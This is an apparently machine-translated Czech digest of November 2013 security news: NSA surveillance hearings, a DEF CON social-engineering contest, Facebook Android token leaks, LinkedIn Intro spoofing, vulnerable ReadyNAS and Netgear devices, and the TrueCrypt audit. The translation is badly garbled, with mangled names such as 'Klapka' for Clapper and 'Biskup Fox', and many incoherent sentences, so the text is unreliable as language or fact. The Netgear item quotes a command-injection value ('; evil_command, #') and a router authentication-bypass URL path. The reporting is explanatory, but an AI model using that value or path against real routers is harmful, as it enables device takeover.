Zpravodajské úředníci před dům Stálého výboru pro tajné služby v úterý popřel sběr telefonní evidenci občanů ve Francii, Španělsku a Itálii, v poslední době hlásí médiích v těchto zemích.
"Tvrzeními Le Monde ve Francii, El Mundo Španělska a L'espresso Itálie jsou zcela nepravdivé," řekl ředitel NSA generálporučík Keith Alexander, který dodal, že screenshoty citovány jako důkaz sbírky byly z nástroje pro správu dat a noviny nechápal, co se dívá. "Nástroj počítá metadata a zobrazí metadata. Tyto údaje byly shromažďovány a legálně, které nám poskytlo zahraničními partnery. Je to informace, které shromažďují na evropské občany. To znamená, že údaj my a naši spojenci v NATO shromážděné v obraně našich zemí a na podporu vojenských operací. "
Nejnovější Snowden úniku přišel k hlavě, když se vynořil obvinění, že NSA a americká zpravodajská špehoval zahraničních hlav států, včetně německé kancléřky Angely Merkelové.
Ředitel Národní zpravodajské James Clapper řekl výboru, který je nedílnou součástí zpravodajských operací, něco, co se naučili ve škole sahající do roku 1963.
"Plány a záměry zahraničních vůdců, je důležité vědět," řekl Klapka. "Je to vytrvalá, protože jsem byl v inteligenci. Vedení záměry je základním principem, co sbírat a analyzovat. "
Klapka řekl zahraniční hlavy státu jsou sledovány, a tento druh činnosti je dvousměrná ulice s USA spojenci mohou provádět stejnou činnost proti americkým vedením.
Předseda výboru Rep. Mike Rogers (R-Mich.) požádal Alexander bod prázdný, pokud američtí spojenci jsou zapojeni do špionáže proti USA, které Alexander odpověděl: "Přesně tak," a dodal, že to probíhá.
Klapka řekl špehuje zahraničních představitelů, včetně spojenců, pomáhá určit, zda americký spojenec politik a činností se shodují.
"Je to pro nás neocenitelné vědět, kde země přicházejí, jaké jsou jejich politiky jsou a jaký mají dopad nás na řadu otázek," řekl Klapka.
Klapka a Alexander opět stála za své činy na pozadí dohledu říkají, je bezkonkurenční na celém světě. Alexander dodal, že NSA budou najmout soukromí a občanských svobod důstojník, přidávat další kontroly a plnění povinností v jejich úsilí.
"Chceme ukázat, že máme dveře, které máme transparentnost a bereme to vážně," řekl Alexander. "Je to obrovský krok kupředu, a je tu víc, co musíme udělat, pokud jde o tlačení informací do tisku."
Oni byli také tlačil na vnímanému nedostatku transparentnosti informuje Kongres odposlechy zahraničních vůdců jako pověřenými 1947 zákona o národní bezpečnosti. Klapka však řekl, že zpravodajské úsilí žil až do ducha i litery zákona.
Dnešní slyšení se konalo pod záštitou možných změn zahraniční zpravodajské Surveillance Act (FISA). Alexandr bránil akce NSA a posmíval úniky pocházející z informátorů Edward Snowdena jako protistátní a škodlivé pro USA 's schopnost se bránit proti teroristům
velkých korporací selhání se bránit proti sociální inženýrství
6.11.2013 Hrozby
Roční sociální inženýrství Capture the Flag soutěž koná v DEF CON může zdát na povrchu být jen příležitostí pro testery pera a hackery, aby se prohnul jejich pretexting svaly. Ale pokud jste jedním z 10 hlavních technologií, výroby a kritické infrastruktury organizace, na něž letošních soutěžících, možná budete chtít přehodnotit, jak dobře vybavené váš personál je odvrátit záludný lidí.
Sociální inženýrství je pilířem a odrazovým můstkem pro téměř všechny cílové útoku, která byla zveřejněna. Hackeři hřeben sociálních médií stránky, on-line fóra, firemní adresáře a jinými zdroji inteligence dispozici hledají hrany, které jim pomohou dostat se přes přední dveře, nebo alespoň přes hranici sítě.
Konečný výsledek se pohybuje před krádeží identity, ke ztrátě dat zákazníka, ke ztrátě duševního vlastnictví nebo vojenské / vládní tajemství.
Letos tým 10 mužů utkali 10 žen, obrací své dovednosti proti takovým Apple, Boeing, Chevron, Exxon, General Dynamics, General Electric, General Motors, Home Depot, Johnson & Johnson a Walt Disney Corp., se zaměřením "flags", jako je učení, které internetový prohlížeč (s) je používán ve společnosti, informace o operačním systému, bezdrátový přístup k informacím, ať už virtuální privátní síť se používá vzdálených pracovníků a zda je na místě kavárna.
Soutěžící museli dva týdny na shromažďování Otevřít zdroj dat zpravodajské před DEF CON, s výjimkou návštěv na místě nebo pokusy o phishing, byli schopni používat pouze webové nástroje, aby připravila zprávu o svých cílů. A pak během DEF CON by konkurenti používají tato data během live-volání zasedání, které se konalo v průběhu ročního hackerské konferenci v Las Vegas.
"Co to bylo pozoruhodné bylo obrovské množství informací získaných během části OSI," řekl Chris Hadnagy, zakladatel sociální-Engineer.com a organizátor SECTF. "Dříve, měli bychom vidět několik zpráv s monster množství informací. Letos tam bylo neuvěřitelné množství informací. Jeden soutěžící našel Internetu přihlašovací stránky s odkazem na dokument nápovědy, které nevyžadovaly pověření. V tomto dokumentu vám dali příklad přihlášení s obrázkem IČ který pracoval a byli jsme schopni se přihlásit a podobné věci jsou šokující v roce 2013 vidět. "
Snad jako šokující je objem a kvalita informací vzdali u cílových organizací. Bez ohledu na oborová kategorie, ať už je to výroba, technologie, maloobchod, nebo energie, ropa a zemní plyn soutěžící byli schopni odejít s podrobnostmi o prohlížeči jsou používané v této společnosti, a číslo verze, to byl vrchol vlajka získat celé soutěž. Operační systém informací byl také vyhledávána a ulovil pro závodníky, jak bylo, zda VPN byl v použití.
"Společnosti jsou stále používáte prohlížeče jako IE 7, většina z nich jsou na IE 7. To je velký omyl, podle mého názoru, "řekl Hadnagy. "Jsou stále používáte zranitelnou prohlížeč a lidé byli ochotni dát, že informace se s cizími lidmi na telefonu. To otevírá je až do nepřeberné množství phishingu, telefonu a na místě zosobnění. "
Vědět takové informace, jako prohlížeč, operační systém, nebo dokonce VPN detaily může dát hacker míru důvěry na výzvu k vnitřní podpoře hledá přístup do systému.
Soutěžící byli také schopni získat informace, které by mohly umožnit fyzický přístup, jako je potravinářský průmysl používá organizace a zda je na místě kavárna, tyto dva údaje byly mezi prvními pěti nejvyhledávanějších a vzdali by kritické infrastruktury, jako je ropa a plynárenství.
"Jak těžké je získat t-shirt, ballcap nebo schránky pro společnost, která dělá stravovací služby? Kolikrát budete se zastavil provádění jídlo do budovy? Nikdo vás zastaví, "řekl Hadnagy. "Nemusíte firemní odznak být neviditelný. To vám otevře až zosobnění útoky. "
Podle bodového hodnocení za předpokladu, v soutěži, Apple dopadli nejhůře, následovaný General Motors, Home Depot, Johnson & Johnson a Chevron. Podrobnosti o konkrétních zranitelných oblastí nebyly zveřejněny, ale jsou k dispozici na vyžádání cílových společností, Hadnagy řekl.
"To je můj názor, ale většina informační školení nestojí za svou váhu," řekl Hadnagy. "Důkazem toho je, jak jsou jednoduché útoky provádějí proti společnostem s pravidelným školením povědomí o bezpečnosti."
Přesto, společnosti, které dělají provádět výcvik, nejsou to dělá pravidelně, podle shromážděných výsledků. Některé refresh méně než rok, zatímco jiní šli tak daleko, že přiznat se pretexters, že by to měl v nové zaměstnance orientaci a nikdy v následujících letech.
"Cílem pro nás pořádání této soutěže je zvýšit povědomí o sociální inženýrství jako hrozbu," Hadnagy a dodal, že by firmy měly zvážit sociálního inženýrství jako součást pravidelné penetračních testů. "Jsme svědky nárůstu sociálního inženýrství v pera testování, ale my nevidíme přijat mnoha velkých korporací."
Facebook pro Android Selhávání umožnit všem aplikaci získat přístup uživatele tokeny
6.11.2013 Viry | Mobil
Výzkumník zjistil závažné zranitelnosti v hlavním Facebook a Facebook Messenger aplikací pro Android, které umožňují jiné aplikaci na zařízení pro přístup uživatele na serveru Facebook přístupový token a převzít její účet. Stejný badatel také objevil zvláštní, podobnou chybu v Facebook Pages manažer pro Android, aplikace, která umožňuje administrátorům spravovat více účtů Facebook. Že chyba umožňuje další aplikace chytit uživatele přístupový token.
Chyby byly objeveny již dříve v tomto roce Mohamed ramadánu, výzkumný pracovník na útok Secure, který nahlásili na Facebook a byl odměněn v roce 6000 dolarů chyb prémií. První chyba spočívá ve způsobu, že hlavní aplikace Facebook a Facebook Messenger aplikace pro Android zařízení zpracovává uživatele přístupový token, což je v podstatě klíčem k přístupu k účtu Facebook. Tato chyba by umožnilo škodlivý aplikaci získat access_token uložených na zařízení uživatele a ukrást uživatelský účet, Ramadán řekl.
"Představte si tento scénář: Jste uživatel Facebooku, máte android telefonu / tabletu a nainstalovali jste si facebook hlavní aplikace a posel aplikace pro Android, nyní dostal zprávu od přítele nebo od někoho na Facebooku, otevře zprávu ke čtení to a tam je připoutání jako: film, doc, pdf, pic, nebo všechny soubory, které mohou být spojeny ve zprávách facebooku, "Ramadán řekl v blogu vysvětluje exploitu scénář.
"Vy jste klikli na soubor ke stažení, a zároveň váš facebook access_token unikly logcat android což znamená, že každý android aplikace mohou číst a zachytit vaše facebook access_token kradmý a přesměrovat váš účet."
"Pokud nechcete vědět, co je logcat, je to nástroj, postavený na všech Android zařízení, sbírat zprávy protokolu ze všech Android aplikací."
Ramadán řekl, že Facebook access_tokens nezanikají, což znamená, že přetrvává nebezpečí, na dobu neurčitou, pokud má uživatel neaktualizoval své Facebook aplikace na opravu této chyby.
Druhá chyba je v Facebook Pages Správce aplikace pro Android, který je určen na pomoc uživatelům spravovat několik různých účtů. Aplikace, které bylo nainstalováno více než 10 milionů krát, má podobnou vadu na hlavní aplikaci Facebook, která umožňuje škodlivý aplikaci získat přístup uživatele access_token, ale v tomto případě, že uživatel nemusí stáhnout nebo spustit libovolný kód z kdekoliv jinde.
To zranitelnost byla oprava stejně, a Ramadán řekl uživatelé by měli aktualizovat své aplikace, aby bylo možno chránit před útoky. Ramadan letos objevili chybu zabezpečení aplikací Facebook a Facebook Messenger app, který umožnil útočníkovi přístup a stáhnout uživatelovy fotografií .
Demonstranti, Crypto-dýchánek Rally Proti dohled na US Capitol
6.11.2013 Kryptografie
WASHINGTON - sobota označilo 12-leté výročí prvním podpisu kontroverzního USA PATRIOT Act, v boji proti terorismu zákona podepsal do práva krátce po teroristických útocích ze dne 11. září 2001, sekce, které se údajně přiznala federální vymáhání práva orgán tajně shromažďovat digitální komunikační údaje milionů nevinných občanů USA.
Protestovat vlády USA zametání program dozoru , které se projevují NSA mravokárcem Edward Snowdena, tisíce ochrany soukromí a bezpečnosti obhájců svolána na Union Station v národě je kapitál a pochodoval na Capitol kroky v sobotu.
Stop Watching Us koalici , konglomerace ví o korupčním jednání, technologové, aktivisté a těžební skupiny, zorganizoval demonstraci požadovali, aby Kongres odhalit plný rozsah federální vymáhání práva je špionážní činnosti. Jako jeden řečník na shromáždění bylo řečeno, koalice sdružuje podivné spojence, čerpání podpory z různých konců politického a kulturního spektra. Členové koalice patří čínský umělec a aktivista za lidská práva Aj Wej-weje, Tea-Party souladu politického fundraising skupiny FreedomWorks, společnost, Vermont, který dělá zmrzlinu, říká Ben & Jerry, Electronic Frontier Foundation a muž široce připočítán s mít vynalezl World Wide Web Tim Berners-Lee, mezi ostatními.
V dopise Kongresu , koalice požadovali, aby se uzákonění reforem "na § 215 zákona USA PATRIOT Act, státní tajemství privilegium a FISA Změny zákona, aby bylo zřejmé, že deka dohled nad aktivitou na internetu, a telefonní záznamy o každé osobě s bydlištěm v USA je zakázán zákonem, a že porušení může být přezkoumáno v kontradiktorním řízení před veřejným soudem, vytvořit zvláštní komisi, aby prošetřila, zprávy a odhalit veřejnosti v rozsahu této domácí špionáže. Tento výbor by měl vytvořit konkrétní doporučení pro právní a regulatorní reformy do konce protiústavní dohled; hnát k zodpovědnosti ty státní úředníci, kteří jsou shledáni být odpovědné za toto protiústavní dohledu ".
Uprostřed hodně zpívání, bubnování a rozhořčený křik, rally diváci dodávány některé 575.000 podepsal anti-sledování návrhy na kroky USA Capitol Building.
Večer před rally, Electronic Privacy Information Center a Public Citizen hostil crypto-party u Public Citizen je druhý příběh kanceláře v Dupont Circle. EFF zaměstnanci a jiné kladen na klinikách o nastavení šifrované e-maily, prohlížení bezpečně na síti Tor, a systém s názvem Secure Drop, který byl původně vyvinut na konci technologem a open-internet aktivista Aaron Swartz a navrženy tak, aby na nekalé praktiky a další citlivé zdroje poskytovat informace bezpečně do médií.
Cryptographer a zabezpečení Internetu filozof Bruce Schneier a bývalý guvernér Nového Mexika a liberální strana prezidentský kandidát Gary Johnson předpokladu myšlenkami na párty crypto.
Schneier vyzval publikum Abyste mohli využívat šifrování, čímž plošně sběr dat příliš drahé pro NSA. Šifrovací práce, tvrdil s tím, že vymáhání práva měl sbíralo desetkrát více informací od Yahoo, než od společnosti Google, který je neintuitivní vzhledem Google mnohem větší uživatelská základna, ale dává smysl, když si uvědomíte, že Google má SSL implementována ve výchozím nastavení a Yahoo pouze nedávno oznámila , že bude implementovat protokol SSL ve výchozím nastavení v nadcházejících měsících.
"Matematika funguje, ale matematika nemá zastoupení," řekl Schneier. "Chyby ve chvíli, kdy otočíte matematiku na software, do systémů, na počítači, na síti."
On pokračoval říkat, že Snowdena je odhalení naznačují, že NSA není prolomení šifrování, ale spíše, že se využívají špatné implementace a výchozí nebo slabé klíče, záměrně vkládání zadní vrátka a exfiltrating data.
Schneier hájil potřebu přejít vládní dohled z velkoobchodní praxe na maloobchodní jednoho pomocí šifrování a dělat sběr dat dražší.
"I když děláte nic tajného," pokračoval, "jste poskytuje krycí provoz všem disidentům, které spoléhají na to, aby zůstali naživu. Čím více se můžete šifrovat, tím více můžeme chránit ty, kteří potřebují pro šifrování. "
Bývalý guvernér Johnson neochotně analogized rozsah programů NSA s klimatem pre-druhá světová válka Německu.
"Nechci, aby vláda opravit nic, když to přijde k Internetu. A já rozhodně nechci vláda do tohoto rozsahu široce založené dohledu, že historicky, nemusíte se vrátit do Německa před druhé světové války a měnového kolapsu, co se stalo v Německu a vzestupem moci Adolfa Hitlera a shromažďování informací. Myslím, že jsem nerad, aby tato analogie se, ale existují a že je místo, kde to všechno nakonec jde. "
LinkedIn Chrání Intro zabezpečení jako výzkumný pracovník Goes phishingu
6.11.2013 Phishing | Zabezpečení
LinkedIn se postavil pro svou novou aplikaci pro iOS Intro tím, že poskytuje nějakou vysoké úrovně transparentnosti na to, jak to zvládá komunikaci mezi zařízeními a své sítě a vzal čas na volání počáteční kritiku aplikace nepřesné a spekulativní.
Mezitím jeden bezpečnostní výzkumník zveřejněné informace on-line o tom, jak se mu podařilo zfalšovat informace o profilu LinkedIn padá do aplikace Mail iOS a relativní snadnost, s níž to usnadňuje phishingový útok.
Úvod dorazil minulou středu a okamžitě bezpečnostní experti vyjádřili znepokojení nad Integrated Service chování, a to zejména, jak to sedí jako proxy mezi nativním klientem Mail iOS a vašeho poskytovatele e-mailu . Všechny IMAP a SMTP zprávy jsou směrovány do a ze serveru LinkedIn a Intro bar je vložen do každé zprávy. Bar je v podstatě zkratka pro odesílatele profilu LinkedIn, a obsahuje jejich profilový obrázek a rozbalovací další informace o osobě, a odkazy na jejich profilu.
Biskup Fox, bezpečnostní poradenství v San Franciscu, posílal dlouhé upozornění o Intro , ukazuje na to, že aplikace pravděpodobně porušuje firemní e-mailovou politiku, zlomí kryptografické podpisy a vytváří centrální sběrné místo pro vládní dohled.
"Většina vašich koncových uživatelů se nebude pochopit dopad těchto změn, ani nebudou vědět, jak zvrátit je, pokud chtějí, aby tak učinily," biskup Fox analytici Vinnie Liu a Carl Livitt řekl. "Ty jsou skutečně dávat svou důvěru v LinkedIn pro správu zařízení svých uživatelů bezpečnost."
Biskup Fox také tvrdil, že Intro nainstaluje nový profil zabezpečení na zařízení Apple, aby se znovu trasu e-mailových zpráv přes LinkedIn. Varují, že vložení nového profilu zabezpečení by mohla umožnit útočníkovi nainstalovat nebo odstranit aplikace, omezit funkčnost na telefonu, nebo dokonce otřete ji.
LinkedIn senior manažer pro zabezpečení informací Cory řekl Scott Úvod nemění zařízení bezpečnostní profil jako biskup Liška navrhne.
"Pracovali jsme s cílem pomoci zajistit, že dopad profilu iOS není dotěrný členu," napsal Scott ve blogpost v sobotu. "Je důležité si uvědomit, že jsme se prostě přidáváte e-mailový účet, který komunikuje s Intro. Profil také nastaví certifikát pro komunikaci s koncovým bodem Web Intro prostřednictvím webového zástupce na zařízení. "
Scott také řekl Intro je izolován na samostatném segmentu sítě, služby byly tvrzené snížení expozice na třetí strany, monitorování a sledování, a že každý řádek pověření kalení a poštovní parsování / vložení kódu byla přezkoumána Partners bezpečnostní poradenství ISEC a pen-testovaných LinkedIn interní analytici.
Kromě toho, bylo potvrzeno, že Scott SSL / TLS se používá k šifrování komunikace mezi zařízením, LinkedIn a poskytovatele e-mailu.
"Když mailem protéká služby LinkedIn Intro, jsme si jisti, nikdy jsme přetrvávají mailové obsah našich systémů v nešifrované podobě," řekl Scott. "A jakmile uživatel získat e-mailu, je šifrovaný obsah odstraněna z našich systémů."
Nic z toho se však odradit bezpečnostní výzkumník Jordan Wright, bezpečnostní inženýr v CoNetrix, od správy k informacím spoof profilu Intro vložené do zprávy e-mailového klienta.
Wright vyslán některé podrobnosti o svém blogu. Začal tím, že zastaví bezpečnostní profil odeslán na zařízení Apple, který instaluje nový e-mailový účet, který plní úlohu proxy, která je umístěna mezi IMAP LinkedIn a SMTP servery. Z profilu, on byl schopný obnovit uživatelské jméno a heslo pro přihlášení do služby LinkedIn. Pomocí této informace, byl schopen vidět obsah LinkedIn IMAP proxy server napíchne do e-mailu a nakonec skrýt existující Intro údaje ve prospěch falešných údajů se injekce do zprávy.
Předvedl neškodný příklad on-line, ale útočník mohl aplikovat odkazy na nebezpečné stránky a aplikací.
"Zatímco LinkedIn Úvod vypadá, že by bylo vhodné na povrch, bezpečnostní rizika případy použití jsou prostě příliš vysoká," řekl Wright.
Skenování Zobrazuje 65% Boxy ReadyNAS na webu ohrožená kritickou chybu
6.11.2013 Zranitelnosti | Bezpečnost
To bylo známé na nějakou dobu nyní, několik měsíců, ve skutečnosti, že je zásadní, vzdáleně zneužít zranitelnost v některých ReadyNAS společnosti NETGEAR pro ukládání boxů a oprava je k dispozici od července. Nicméně, mnoho z polí vystavených na webu jsou stále zranitelné, a nedávná kontrola v HD Moore Rapid7 zjistili, že asi 65 procent z ReadyNAS zařízení dosažitelné na portu 80, je stále unpatched.
Moore, zakladatel Metasploit projektu a ředitel výzkumu v Rapid7, měl zájem přijít na to, kolik ReadyNAS krabice byly vystaveny na webu, a pak, jak mnozí z těch, běhali zranitelné firmware. K tomu, že on používal jeho projektu Sonar infrastrukturu pro skenování adresního prostoru IPv4 a identifikovat ReadyNAS zařízení. To otisk bylo provedeno zasláním požadavku GET na portu 80 a ReadyNAS zařízení poslán zpět identifikovatelný záhlaví.
"Napsal jsem rychlý skript pro zpracování těchto dat přes stdin, zápas ReadyNAS zařízení a vytisknout IP adresu a Last-Modified datum z hlavičky odpovědi. Běžel jsem syrové skenování výstupu pomocí tohoto skriptu a udělal kafe. Výsledek z našeho 4.října testu se skládal z 3488 řádků výsledků. To je trochu jiný než čísel uvedených v Shodan, ale lze vysvětlit tím, DHCP, více sloučených vyšetření, a skutečnost, že webové rozhraní ReadyNAS se většinou běžně přístupná přes SSL na portu 443, "Moore napsal v blogu na experiment.
"Zajímavá část o Last-Modified záhlaví je, že to vypadá, že korelují s konkrétními verzemi firmwaru. Verze 4.2.24 byla postavena na 02.07.2013 a můžeme předpokládat, že všechny verze před které jsou unpatched. "
Moore přišel s boxy ReadyNAS 3488 vystavena na portu 80, a ty, 2257 z nich běží zranitelné verze firmware. Řekl, že není jasné, zda se výsledky budou výrazně odlišné, pokud kontrola byla provedena na portu 443.
Chyba zabezpečení v zařízení ReadyNAS, která byla objevena výzkumníkem Tripwire Craig Young, umožňuje útočníkovi spustit příkazy na zranitelné zařízení v rámci webového serveru. Mladá má proof-of-concept exploit, který mu dává reverzní shell.
Některé routery Netgear Otevřené pro vzdálenou autentizaci Bypass, Command Injection
6.11.2013 Zranitelnosti | Hrozby
Tam je chyba v některých Netgear bezdrátové směrovače, který umožňuje vzdálenému útočníkovi dovolit ohrozit kompletně zařízení a získat oprávnění uživatele root. Chyba je triviálně využitelné a badatel, který objevil zveřejnil proof-of-concept exploit.
Tato chyba zabezpečení je nástroj příkazového injekce vada, která v kombinaci se samostatným ověřování bypass chyba, že stejný výzkumník zjistil, můžete dát útočník jednoduchý root přístup zranitelných routerů. Chyba je v routeru Netgear WNDR3700v4 , domácí dvoupásmový gigabitový router a Zach Cutlip, badatel, který objevil chybu, že jeho zneužití může zneužít chybu, zakažte ověřování, otevřete Telnet server a potom obnovit router do původní stav, takže uživatel si neuvědomuje, co se stalo.
Tato chyba zabezpečení zahrnuje funkci nazvanou cmd_ping6 (), který je určen na ping nějaký daný název hostitele adresy IPv6. Nicméně chyba ve firmware umožňuje útočníkovi použít tuto funkci jako vektor ke kompromisu cílového směrovače a pak dělat, co se mu zachce. Chyba ovlivňuje verze 1.0.1.32 a 1.0.1.42 z routeru firmware.
"Co se tady děje, jak to tak často dělá, je hostitel řetězec dostane zkopírován do shellu příkazem na zásobníku pomocí sprintf (). To je pravděpodobně nejpřímější buffer overflow chyba, budete někdy vidět. Bohužel, neměli byste ji využít. Je to lákavé, kdo využívají, protože je tak čistý a jednoduchý, a proto objevovat kořen s nákladem MIPS ROP je sexy. Ale to by bylo hloupé, protože hned po ní je volání system (). Systém (systémy) Funkce propustí, co řetězec je dána k vyvolání / bin / sh. Jedná se o příkaz injekce zranitelnost ve své nejčistší podobě a je triviálně zneužít. Pokud je adresa řetězec, který je předán v něco jako "; evil_command, #", bude ping6 příkaz předčasně ukončit a evil_command bude provedena ihned po tom, "Cutlip, vedoucí výzkumný pracovník na zranitelnost Tactical Network Solutions, napsal ve svém vysvětlení Netgear vady .
Dříve Cutlip objevil a publikoval vysvětlení jiné zranitelnosti ve stejném routeru, který umožňuje útočníkovi obejít ověření funkce na routeru. Použití této chybě ve spojení s příkazového vstřikování zranitelnosti dává útočník silný způsob vlastnictví a zůstat rezidentní na Netgear routery.
"Pokud přejdete na http:// <router address> / BRS_02_genieHelp.html, budete moci obejít autentizaci pro všechny stránky v celé rozhraní pro správu. Ale nejen to, ověřování zůstává zakázána i po restartu. A samozřejmě, pokud vzdálená správa je zapnuta tato díla z Internetu frickin ', "řekl Cutlip vysvětlení chyby ověřování bypassu.
Exploit že Cutlip psal pro příkaz vstřikování zranitelnosti využívá autentizační problém stejně a dělá to docela jednoduché pro útočníka jít po zranitelné zařízení. Řekl, že když tam není žádná oprava k dispozici právě teď, nejlepší zmírnění postižených uživatelů je zakázat vzdálenou správu svých směrovačů.
"Vzdálená správa je hlavním útoku se podíváme a najít chyby v pro routery SOHO. Také se ujistěte, že je povoleno šifrování WPA2, a že nedůvěryhodné zařízení se nesmí připojit k síti, a to buď prostřednictvím kabelové nebo bezdrátové, "řekl Cutlip e-mailem.
Cutlip zmínil na Twitteru, že chyby, které našel byly také objeveny nezávisle jiný výzkumník Craig Young z Tripwire, který také našel vážnou chybu v zařízení ReadyNAS společnosti NETGEAR produktu.
Jeden TrueCrypt Audit roste, dává další nástroj pro šifrování iniciační OK
6.11.2013 Kryptografie
UPDATE - snaha o auditu TrueCrypt , open source nástroj pro šifrování, získal důležitý souhlas v posledním týdnu, kdy člen jeho anonymní vývojového týmu oslovili organizátoři IsTrueCryptAuditedYet ?
"Napsal nám příjemné, ale formální dopis o tom, že by byli rádi, kdo se dozví o auditu, pokud jde o vážné úsilí, a ne" peníze pro nic za nic, "řekl Matthew Green, cryptographer s Johns Hopkins University v Baltimore, který spolu s kolegou výzkumníkem Kenneth White pomohl dostat audit ze země. Řekl Green developer očekává, že audit fungovat nezávisle na TrueCrypt aby se zabránilo vzniku střetu zájmů.
Audit doufá, že odpoví na řadu otázek, které se vyskytly na novém významu zvažování zjevení o dohled vlády USA na Američany ve jménu národní bezpečnosti. Základní otázkou je, zda TrueCrypt, což bylo staženo více než 28 milionů krát, byl back-doored. Bezpečnostní experti mají obavy také o vlastní open source licencí se řídí její použití, zda se otevírá uživatelům až dalších právních rizik.
Mezitím, samostatný přezkum TrueCrypt byla provedena de Carnavaletova Xaviera de carne "Concordia University v Kanadě, který došel k závěru, TrueCrypt není backdoored mezi dostupnými zdroji a dvojhvězd. DeCarnavalet řekl, že byl schopen reprodukovat deterministický proces kompilace specifické pro TrueCrypt pro Windows, který odpovídá binární soubory. Zelené a bílé se rychle chválit chválit takový projekt a grassroots úsilí.
"TrueCrypt může být stále trochu backdoored, ale to by byl zapsán ve zdrojovém kódu a ukázalo by se ve vážném kódu auditu (nechat stranou důvěru v kompilátory a počítače). To, co jsem dokázal, že program na webové stránce vychází z dostupných zdrojů, a nic (žádný backdoor) byl tajně přidal mezi tím, "řekl de Carnavalet Threatpost. "To je kód audit hodný, jinak by auditoři být jisti, že analyzovat správnou věc. Jen jsem překlenul propast, abych tak řekl. "
Pokud jde o fundraising úsilí získat peníze najmout profesionálního kód auditorskou společnost a právní pomoc, aby přezkoumala licenci, skočil 17,000 dolarů v posledním týdnu. 53,000 dolarů zvedl doposud pomohl organizátoři vypracování počáteční cestovní mapu pro audit. Kód audit se zaměří na dvě oblasti v první řadě, řekl Green: Kódování použité v TrueCrypt, jakož i vyhodnocení verze Windows. Na rozdíl od TrueCrypt pro Linux, například Windows uživatelé mohou stáhnout binární soubory spíše než zdrojový kód. Ti binárky nelze srovnávat ke zdrojovému kódu, a chovají se jinak než ostatní verze.
Například TrueCrypt 7.0a vyplní poslední 65024 bajtů záhlaví s náhodnými hodnotami. Jsou hodnoty skutečně náhodný, nebo jsou šifrování hesla zajištění objemu TrueCrypt? Pokud TrueCrypt je ohrožena, a tyto hodnoty jsou zašifrované heslo, že klíč k dispozici pouze třetí osobě, která ji šifrování.
Řekl Green auditu organizátoři jsou stále v procesu získávání nabídek od bezpečnostní firmy, aby provedla audit kódu.
"Nemohu vám specifika, ale stačí říct, že 50.000 dolarů není tak daleko, jak si myslíte, že ano, když jste diskutovali o full-nákladní auditem top společnosti," řekl Green. "Teď doufáme, že využít nějaké velkorysosti ze strany různých firem, takže nebudeme platit plné ceny. A my už dostal nějaké velkorysé nabídky (včetně jednoho z otevřených Technologického fondu). Ale na konci dne, chceme získat profesionální výsledky, a dokonce i při prudkém slevy, druh práce je drahá. "
Mezitím de Carnavaletova práce, řekl, by mělo usnadnit obavy software je důvěryhodnost.
"Já představit, jak jsem sestavil TrueCrypt 7.1a pro Windows a dosáhl velmi vyrovnané utkání na oficiální binární," napsal v článku o tomto procesu. "Jsem také schopen vysvětlit malé zbývající rozdíly a pak dokázat, že oficiální binární skutečně pocházejí z veřejných zdrojů."
Zelené a bílé pochválil práci jako pomocný, aby mohli nakonec přijít na deterministický vybudovat pro TrueCrypt, zejména při sestavování předpoklad balíček nástrojů Microsoft, aby správně sestavit TrueCrypt.
"Jeho výsledky jsou jistě užitečné datový bod, ale spíše proto, že podrobného stavět proces on sdílel (zejména tam, kde se odklání od stávající dokumentace). Jeho práce v pátrání po přesně, jaké přesné aktualizace Windows Service Pack a verze Visual Studio je potřeba, GUID, kontrolní součet vestavby apod. je užitečné zejména, když jsme pravidelně provádět nezávislé ověřování, "řekl White. "Ale podle mého názoru, je to jen jeden kus dosažení našeho cíle, deterministické stavět nutnou, nikoli však postačující předpoklad pro komplexní dešifrování kódů a auditu. A z mého čtení, myslím, že Xavier souhlasí. "
Carnavalet říká, že nějaké zadní vrátka jsou neexistující v TrueCrypt 7.1a z dostupných zdrojů, ale až poté, co byl schopen reprodukovat prostředí na vývojářskou úzce.
"Moje analýza může sloužit [Audit] pochopit význam běží přesně stejné verzi kompilátoru, aby bylo možné poskytnout deterministický stavět. Naštěstí TrueCrypt zdroje mají pracovní Visual Studio řešení připravené k sestavení a zmírnit tak spoustu problémů, které mohou vyplynout z rozdílů v konfiguraci projektu, "napsal. "Nyní se úsilí soustředilo na audit zdrojového kódu, spíše než se snažit uskutečnit zpětné inženýrství na celý software k hledání neexistující zadní vrátka."
Audit chce dát znepokojení nad pochybnou licencí TrueCrypt k odpočinku
6.11.2013 Kryptografie | zabezpečení
Seznam odpůrců na TrueCrypt open source licencí , je dlouhý a zahrnuje některé populární distribuce jako Debian, Fedora a potažmo Red Hat. Ve skutečnosti, tahanic o licenci TrueCrypt sahá až v roce 2006, dlouho předtím, než tam byly vážné dotazy, pokud jde o důvěryhodnost populární software šifrování disku a zda to bylo tím, backdoored tříznakovou americké zpravodajské agentury, nebo cizí moci .
Nyní, že vážná snaha je pod způsobem, jak audit integritu nejen kódu TrueCrypt, ale jeho licence , lidé chtějí, aby obavy o použití TrueCrypt k odpočinku, řešení nejen stav licence, ale také dokumentovat opakovatelný deterministický vychází z TrueCrypt od zdroje Kód pro Windows, Mac OS X a Linux.
Licence však vyžaduje právní pomoc uvést do náruče. To vyžaduje dohodnuté výklady licence, která je někteří nazývají "nebezpečné" a řekl, představuje větší riziko a závazek vůči svým uživatelům, než to stojí.
"Je to jedna z nejméně otevřených open-source licencí," řekl Kenneth White, který spolu s cryptographer Matthew Green, pomohl dostat IsTrueCryptAuditedYet? mimo zemi. "Je to jistě velmi netradičním případu norem práva Spojených států."
Projekt je v současné době nejen vyhodnocení auditu profesionální poskytovatele služeb, kteří se díváme na 1s a 0s za TrueCrypt , ale také hledá právní pomoci prokousat murkiness, že je licence. K dnešnímu dni je již zvýšil více než 50.000 dolary na financování úsilí.
Na pozadí dohledu ze strany NSA a volání podívat se blíže na kód TrueCrypt, zejména Windows binární soubory, licence byla otázka přezkoumána na 16.října na OpenSource.org fóru . Některé vyjádřil potíže s mnoha ustanoveními uvedenými v licenci, a to i poté, co byl přezkoumal a některé počáteční obavy řešit. Například, plakáty na fóru se o to, jak široký odškodnění klauzule je chránit anonymní autoři TrueCrypt. Jazyk je matoucí a vágní, takže příliš velký prostor pro interpretaci, podle některých, ve skutečnosti je to něco, co se zdá licence potvrdit s ustanovením, že státy:
"Pokud si nejste jisti, zda jste pochopili všechny části této licence, nebo pokud si nejste jisti, zda je možné v souladu se všemi podmínkami této licence, nesmíte používat, kopírovat, upravovat, vytvářet odvozená díla, ani (re ) distribuovat tento produkt, ani část (i) z toho. Měli byste se poradit s právníkem. "
